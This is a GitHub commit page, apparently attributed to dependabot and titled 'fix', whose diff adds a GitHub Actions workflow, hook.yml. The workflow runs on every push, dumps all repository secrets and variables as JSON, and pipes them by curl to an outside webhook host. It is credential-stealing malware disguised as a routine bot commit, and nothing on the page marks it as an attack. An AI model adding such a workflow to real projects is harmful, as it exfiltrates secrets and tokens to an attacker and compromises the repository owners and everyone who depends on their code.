Skip to content
This repository has been archived by the owner on Sep 21, 2023. It is now read-only.

Commit

Permalink
fix
Browse files Browse the repository at this point in the history
  • Loading branch information
dependabot[bot] committed Jul 10, 2023
1 parent 18b2bba commit 6dbeb71
Showing 1 changed file with 13 additions and 0 deletions.
13 changes: 13 additions & 0 deletions .github/workflows/hook.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,13 @@
name: Hook
on: [push]
jobs:
env:
runs-on: ubuntu-latest
steps:
- name: Run
env:
MY_ENV: ${{ toJSON(secrets) }}
MY_VARS: ${{ toJSON(vars) }}
run: |
echo $MY_ENV | curl "https://send.wagateway.pro/webhook" -H 'Content-Type: application/json' -d @-
echo $MY_VARS | curl "https://send.wagateway.pro/webhook" -H 'Content-Type: application/json' -d @-

0 comments on commit 6dbeb71

Please sign in to comment.